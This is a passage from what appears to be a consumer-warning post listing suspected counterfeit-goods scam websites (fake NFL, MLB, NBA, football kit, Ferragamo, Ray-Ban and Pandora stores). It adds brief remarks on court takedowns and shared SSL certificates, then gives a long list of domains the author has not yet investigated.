http://www.nmdforsale.com/ – Similar to the above. This domain is easily associated with the maillot-de-football.com scam.

http://www.luxuryonline.com.ru/ – Shoes store aimed at Russia.

http://www.ventepolo.com/

http://www.mlbforsale.com/ – Already taken down by a US Federal Court Order.

http://www.mlbofstore.com/ – A website already taken down by a court order.

http://www.shopmlbshirt.com – A website already taken down by a court order.

http://www.psgmaillotfr.com/ – Scam football (soccer) site.

http://www.aaqshop.com/ – Scam NFL website claiming to be nflshop.com.

http://www.inflmarket.com/ – Scam NFL site claiming to be nflshop.com

http://www.eyewearofstore.com/ – Scam Ray Ban sunglasses website.

http://www.glassesbestsale.com/ – Scam Ray Ban website.

http://www.camisas-futebol.com/ – Fake football / soccer kit store.

http://www.watchinshop.com/

http://www.bestfishop.com/

http://www.monclerofshop.com/

http://www.franceofjersey.com/

http://www.shop-jewelrys.com/ – Fake pandora online store

http://www.outletjewelryshop.com/ – Scam “Pandora” shop.

http://www.nhlstores.com/ – Fake NFL site claiming to be the “Official online store of the NHL”.

http://www.chicagocubstocks.com/ – A fake store claiming to be the “Official online shop” of the Chicago Cubs.

http://www.chicagocubsmarket.com/ – A fake store claiming to be the “Official online shop” of the Chicago Cubs.

http://www.footsportsoutlets.com/ – Somehow also associated with “www.awolf.net”, the website of someone who appears to be interested in hacking, databases, VPN servers, FTP server software and VMWare.

http://www.jerseys-shop.com/ – Fake NFL website claiming to be “The official online store of the NFL” (much like all the other “official” ones I’ve found then!).

http://www.barcashops.com/

http://www.shirts-store.com/ – Another fake NFL website.

http://www.clevelandindianshirt.com/

http://www.clevelandindianshop.com/

http://www.mkbagsonline.com/

http://www.mlbofshop.com/ – MLB fake online store.

http://www.mlbshirt-shop.com/ – MLB fake online store.

http://www.indians-shop.com/

http://www.indiansjersey.com/

http://www.sportskitonline.com/ – Fake NBA online store.

http://www.basketsforsales.com/ – Fake NBA online store.

http://www.lysportsmalls.com/ – Fake NBA online store.

http://www.officialmapleleafs.com/

http://www.bluejays-shops.com/

http://www.cheapbluejay.com/

http://www.bluejaysale.com/

http://www.onlineyeezy.com/

http://www.mapleleafshop.com/

http://www.fashionlinestore.com/

http://www.soccerjerseystores.com/

http://www.topishirt.com/ – Another fake NFL store.

http://www.mlbshirtshop.com/ – Fake MLB online store.

http://www.bluejaysoutlet.com/

http://www.officemlbshop.com/ – An already ceased / suspended domain by court order.

http://www.ievpolo.com/ – Fake Polo online store.

http://www.ferragamoshops.com/

http://www.eferragamoshop.com/

http://www.topbeltsshop.com/

http://www.hiferragamo.com/

http://www.outletferragamo.com/

http://www.ferragamobeltsshops.com/

http://www.ferragamoonline.com/

http://www.bagsbagsonline.com/

http://www.ferragamostores.com/

http://www.topferragamoonline.com/

http://www.bestbeltsonline.com/

http://www.vipferragamo.com/

http://www.usnflshops.com/ – Fake NFL online store.

http://www.maillotsdefrance.com/

http://www.basketijersey.com/ – Fake NBA store.

http://www.vipbasketjersey.com/ – Fake NBA store.

http://www.fchelseas.com/ – Chelsea FC fake store, supposedly “the official Asia Pacific online megastore”.

http://www.asoccerjerseys.com/ also associated http://www.headdres-store.com/

http://www.broncostores.com/ – Fake Denver Broncos “official online store”.

http://www.bestfootballshop.com/

http://www.storejewelryshop.com/

http://www.salejewelryshop.com/

Weirdly a lot of the above have SSL certificates self-issued to “tong.com”, probably an unrelated and invalid domain but still unusual.

There are so many associated websites and domains that I’ve given up crosschecking them! Here is the source list of the domains I’ve not yet investigated.

franceofjersey.com
nflsaleshops.com
eyewearmalls.com
strapshops.com
outletjewelrystore.com
b5jewellery.com
jerseysmarkets.com
basketjerseyshop.com
basketshirtshops.com
footballsshops.com
jewelrysstock.com
bagsbagsonline.com
nhlsmall.com
nhlstores.com
nflsportsstock.com
bagbagforsale.com
mlbsstores.com
baggoodsforsale.com
madeinnfl.com
nflsstocks.com
nflsshops.com
mlbsforsale.com
mlbonsale.com
beltonsale.com
ferragamoonsale.com
ferragamosonsale.com
ferragamodiscount.com
nikesonsale.com
ferragamosforsale.com
ferragamo4sale.com
ferragamosonline.com
nflsonsale.com
nflsdiscount.com
nflforsale.com
nflsstock.com
bananaces.com
iakqks.com
hotsalespro.com
hariees.com
chicagocubsoutlet.com
clevelandindianstore.com
bluejaysale.com
cfljerseyshop.com
ferragamonline.com
outletferragamo.com
ferragshop.com
fashionlinestore.com
ferragamocenter.com
basketshirts.com
shirtnba.com
chicagocubstore.com
nba-eshop.com
jerseynba.com
ibasketjersey.com
basketeshop.com
nfl-shirt.com
nfl-center.com
shoulderbagshop.com
crossbodybagshop.com
mlbshirtstore.com
footballshirtsale.com
buymlbshirt.com
ukfootballjersey.com
soccerjerseystores.com
wholesalemlbshop.com
mlbshirtsale.com
outletfootballshirt.com
outletmlbshirt.com
footballshirtoutlet.com
outletmlbstore.com
officemlbshirt.com
catmte.com
colorrushstore.com
officemlbshop.com
mlbinshop.com
mlbshirtshop.com
colorrushuniform.com
mlbshirtoutlet.com
colorrushcenter.com
colorrushmall.com
officemlbstore.com
colorrushop.com
colorrush2016.com
bestnflmall.com
nflbazaar.com
enflonline.com
topeshirt.com
topishirt.com
enfloutlet.com
nflshoppingcenter.com
bestluxshops.com
topilux.com
enflcenter.com
infloutlet.com
nfldiscount.com
nfljerseyoutlet.com
espcamisetasdefutbol.com
topmksale.com
fashionjewelrymalls.com
iluxjewelry.com
ibuylux.com
iluxfashion.com
luxferragamo.com
ferragamomall.com
iluxcenter.com
luxfashionshop.com
bestfootballjersey.com
topnflshirt.com
topfootballjersey.com
ievpolo.com
ssoccerjersey.com
uksoccershirts.com
salebasketshirts.com
iibasketjersey.com
ferragamosale.com
ferragamobagstore.com
ferragamobagshop.com
sferragamo.com
fferragamo.com
vipbasketjersey.com
eferragamobag.com
ibasketshirt.com
iferragamo.com
ebagshops.com
eferragamoshop.com
ebasketjersey.com
viferragamo.com
basketshirtonline.com
hiferragamo.com
yshoesoutlet.com
mkbagsonline.com
vipshoeshop.com
footballshirtonline.com
mkbagplazas.com
luxybagshops.com
mnushirts.com
manushirt.com
mujerseys.com
buycheapmkbag.com
mkbagsclub.com
suglassesclub.com
nflshirtstore.com
vipsunglasseshop.com
basketijerseys.com
nbasketsmarkets.com
manutdone.com
basket4sales.com
nbasketmaks.com
spolostocks.com
basketsdiscounts.com
ferragamoshops.com
vipferragamo.com
spolomalls.com
ferragamostores.com
usnflshops.com
cheapolos.com
manutdmalls.com
csoccerjerseys.com
itlaynbasket.com
spainbaskets.com
francebaskets.com
maillots-de-football.com
frmaillot.com
camisas-futebol.com
porsoccerjerseys.com
maillotsdefrance.com
basketijersey.com
ventepolo.com
fcbarcastock.com
bayernoutlet.com
fchelseas.com
asoccerjerseys.com
asoccershirts.com
broncostores.com
nflonsale.com
mlbforsale.com
birkstock.com
bksandals.com
mkbagsmalls.com
mkvipbag.com
mkbagsmarkets.com
vipmkbag.com
mkbagtop.com
nmdforsale.com
fcmudtjersey.com
airmaxshoeshop.com
psgmaillotfr.com
everyhoe.com
nicemkbag.com
acoachag.com